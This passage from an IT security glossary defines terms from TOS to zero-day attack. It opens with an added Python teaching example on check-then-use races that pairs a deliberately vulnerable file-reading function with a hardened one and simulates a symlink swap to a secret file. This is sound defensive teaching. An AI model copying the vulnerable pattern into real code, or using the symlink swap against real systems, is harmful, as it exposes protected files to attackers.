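An added example, not part of the original glossary, that illustrates both the race condition entry and this one, in Python on a POSIX system (O_NOFOLLOW is assumed to exist). The `between_check_and_use` hook stands in for the attacker's thread: it is a constructed stand-in for the timing window, swapping the checked file for a symbolic link to a secret. The hardened version opens the path first with `O_NOFOLLOW`, then inspects the descriptor it actually obtained with `fstat`, so there is no window between check and use.

```python
import os
import stat
import tempfile


def read_regular_file_vulnerable(path, between_check_and_use=lambda: None):
    """Check-then-use: the path is validated, then re-resolved by name on open."""
    if os.path.islink(path) or not os.path.isfile(path):
        raise PermissionError("refusing non-regular file")
    between_check_and_use()            # the race window: an attacker acts here
    with open(path, "rb") as f:        # open() follows whatever `path` points to now
        return f.read()


def read_regular_file_hardened(path):
    """Open first, then check the object that was actually opened."""
    # O_NOFOLLOW makes open() fail with ELOOP if the final component is a symlink.
    # Assumes a POSIX platform; O_NOFOLLOW does not exist on Windows.
    flags = os.O_RDONLY | os.O_NOFOLLOW | getattr(os, "O_CLOEXEC", 0)
    fd = os.open(path, flags)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):   # check the descriptor, not the name
            raise PermissionError("refusing non-regular file")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:     # fdopen takes ownership of fd and closes it
        return f.read()


def demo():
    """Constructed scenario: an 'upload' is swapped for a symlink to a secret file."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret")
        upload = os.path.join(d, "upload.txt")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")
        with open(upload, "wb") as f:
            f.write(b"harmless")

        def attacker():                # runs inside the vulnerable function's window
            os.remove(upload)
            os.symlink(secret, upload)

        leaked = read_regular_file_vulnerable(upload, attacker)   # passes the check, reads the secret
        try:
            read_regular_file_hardened(upload)                    # upload is now a symlink
            blocked = False
        except OSError:                                           # ELOOP from O_NOFOLLOW
            blocked = True
        safe_read = read_regular_file_hardened(secret)            # a genuine regular file still works
        return {"leaked": leaked, "blocked": blocked, "safe_read": safe_read}
```

`O_NOFOLLOW` protects only the final path component; if an attacker controls a parent directory, use a directory file descriptor with `os.open(..., dir_fd=...)` or work from a directory the attacker cannot write to. A privileged program should also drop privileges before opening user-supplied paths, so that the check is enforced by the kernel rather than by the program.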

TOS See trusted operating system.

total cost of ownership (TCO) A measure of the overall costs associated with securing an organization, including insurance premiums, finance costs, administrative costs, and any losses incurred. This value should be compared to the overall company revenues and asset base.

transaction log backup A backup that captures all transactions that have occurred since the last backup.

transparent data encryption (TDE) A newer encryption method used in SQL Server 2008 and later that provides protection for the entire database at rest without affecting existing applications by encrypting the entire database.

Transport Layer Security/Secure Sockets Layer (TLS/SSL) A security protocol used to create encrypted, authenticated connections to servers. TLS is the standardized successor to SSL; all SSL versions and TLS 1.0 and 1.1 are deprecated (RFC 8996), leaving TLS 1.2 and 1.3 as the current versions.

transposition The process of shuffling or reordering plaintext to hide an original message. Also referred to as permutation.

transposition cipher A cipher that scrambles the letters of the original message into a different order.

Triple DES (3DES) A version of DES that applies the DES algorithm three times (encrypt, decrypt, encrypt) with three 56-bit keys, or with two keys in a weaker variant. Its effective strength is about 112 bits, its 64-bit block is vulnerable to birthday attacks when large volumes of data are encrypted under one key (Sweet32), and NIST has deprecated it in favor of AES.

trunk link A link between switches and between routers and switches that carries the traffic of multiple VLANs.

trusted operating system (TOS) An operating system that provides sufficient support for multilevel security and evidence of correctness to meet a particular set of government requirements.

trusted platform module (TPM) A security chip installed on a computer's motherboard that generates and protects symmetric and asymmetric keys, stores measurements (hashes) of the boot sequence in platform configuration registers (PCRs), and can attest to that measured state and to its certificates for a remote party.

Twofish A block cipher designed by the Blowfish team as its successor and submitted as an AES finalist. It encrypts 128-bit data blocks using 128-, 192-, or 256-bit keys and performs 16 rounds of transformation.

Type I hypervisor (or native, bare metal) A hypervisor that runs directly on the host’s hardware to control the hardware and to manage guest operating systems.

Type II hypervisor A hypervisor that runs within a conventional operating system environment.

Unified Extensible Firmware Interface (UEFI) A firmware interface that replaces the legacy BIOS as the layer between the operating system and the platform firmware, and that hosts features such as secure boot.

unified threat management (UTM) A device that combines a traditional firewall with content inspection and filtering, spam filtering, intrusion detection, and antivirus.

usability Making a security solution or device easier to use and matching the solution or device more closely to organizational needs and requirements.

UTM See unified threat management.

validation testing Testing to ensure that a system meets the requirements defined by the client.

vascular scan A scan of the pattern of veins in a user’s hand or face.

video conferencing Services and software that allow for online meetings with video capability.

virtual desktop infrastructure (VDI) An infrastructure that hosts desktop operating systems within a virtual environment in a centralized server.

virtual firewall A software or hardware firewall that has been specifically created to operate in the virtual environment.

virtual local area network (VLAN) A logical subdivision of a switch that segregates ports from one another as if they were in different LANs.

Virtual Network Computing (VNC) A remote desktop control system that operates much like RDP but uses the Remote Frame Buffer protocol.

virtual private network (VPN) A network whose connections use an untrusted carrier network but provide protection of the information through strong authentication protocols and encryption mechanisms.

virtual storage Storage in which multiple physical locations are pooled from multiple network storage devices and presented to users as a single storage location.

virtual storage area network (VSAN) A logical division of a storage area network, much like a VLAN is a logical subdivision of a local area network.

virtual switch A software application or program that offers switching functionality to devices located in a virtual network.

virtual trusted platform module (VTPM) A software object that performs the functions of a TPM chip.

VM escape An attack in which the attacker breaks out of a VM's normally isolated state and interacts directly with the hypervisor or host, from which the other guests on the same host can be reached.

VMS See vulnerability management system.

voice over IP (VoIP) A phone system that utilizes the data network and packages voice information in IP packets.

voice pattern or print A scan that measures the sound pattern of a user stating a certain word.

VSAN See virtual storage area network.

V-shaped model A development method that departs from the waterfall method in that verification and validation are performed at each step.

vulnerability An absence or a weakness of a countermeasure that is in place. Vulnerabilities can occur in software, hardware, or personnel.

vulnerability assessment An assessment whose goal is to highlight an issue before someone either purposefully or inadvertently leverages the issue to compromise a component.

vulnerability management system (VMS) Software that centralizes and to a certain extent automates the process of continually monitoring and testing a network for vulnerabilities.

vulnerability scanner Software that can probe for a variety of security weaknesses, including misconfigurations, out-of-date software, missing patches, and open ports.

war chalking A practice that is used to typically accompany war driving. Once the war driver locates a WLAN, he indicates in chalk on the sidewalk the SSID and the types of security used on the network.

war driving The process of riding around with a wireless device connected to a high-power antenna, searching for WLANs.

WASC See Web Application Security Consortium.

waterfall method A development method that breaks the process up into distinct phases. It is somewhat of a rigid approach in which a sequential series of steps are followed without going back to earlier steps.

WAYF See Where Are You From.

web application firewall (WAF) A device that applies rule sets to an HTTP conversation. These sets cover common attack types to which these session types are susceptible.

Web Application Security Consortium (WASC) An organization that provides best practices for web-based applications along with a variety of resources, tools, and information that organizations can make use of in developing web applications.

web conferencing Services and software that allow for chatting, sharing documents, and viewing the screen of a presenter.

Web Services Security (WS-Security) An extension to SOAP that is used to apply security to web services.

whaling A subset of spear phishing that targets a single person who is significant or important.

Where Are You From (WAYF) An SSO system that allows credentials to be used in more than one place. It has been used to allow users of institutions that participate to log in by simply identifying the institution that is their home organization. That organization then plays the role of identity provider to the other institutions.

white box testing Testing in which the team goes into the process with a deep understanding of the application or system.

white hat A person who attempts to break into an organization's systems with its authorization and without malicious intent, reporting what is found so that it can be fixed.

Whois A protocol used to query databases that contain information about the owners of Internet resources, such as domain names, IP address blocks, and autonomous system (AS) numbers, which identify the networks that exchange routes with Border Gateway Protocol (BGP) on the Internet.

Wi-Fi Alliance A group of wireless manufacturers that promotes interoperability.

Wi-Fi Protected Access (WPA) A wireless security protocol that uses Temporal Key Integrity Protocol (TKIP) for encryption.

Wired Equivalent Privacy (WEP) The first security measure used with 802.11. It can be used to both authenticate a device and encrypt the information between an AP and a device. The problem with WEP is that it uses the RC4 algorithm with a short (24-bit) initialization vector and a weak key-scheduling construction, so an attacker who collects enough traffic can recover the key in minutes.

wireless controller A centralized appliance or software package that monitors, manages, and controls multiple wireless access points.

work recovery time (WRT) The difference between the RTO and the maximum tolerable downtime (MTD): the time remaining after the RTO, before the MTD is reached, in which restored systems are verified and brought back into production.

WPA2 A wireless security protocol that is an improvement over WPA. WPA2 uses Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), based on the Advanced Encryption Standard (AES), rather than TKIP.

WRT See work recovery time.

XACML See Extensible Access Control Markup Language.

XMPP See Extensible Messaging and Presence Protocol.

Zachman framework An enterprise architecture framework that is a two-dimensional classification system based on six communication questions (what, where, when, why, who, and how) that intersect with different views (planner, owner, designer, builder, subcontractor, and actual system).

zero-knowledge test A test in which the testing team is provided with no knowledge regarding the organization’s network.

zero-day attack An attack that exploits a vulnerability in an application or operating system that is not yet known to the software's developers, so no patch or signature exists for it.
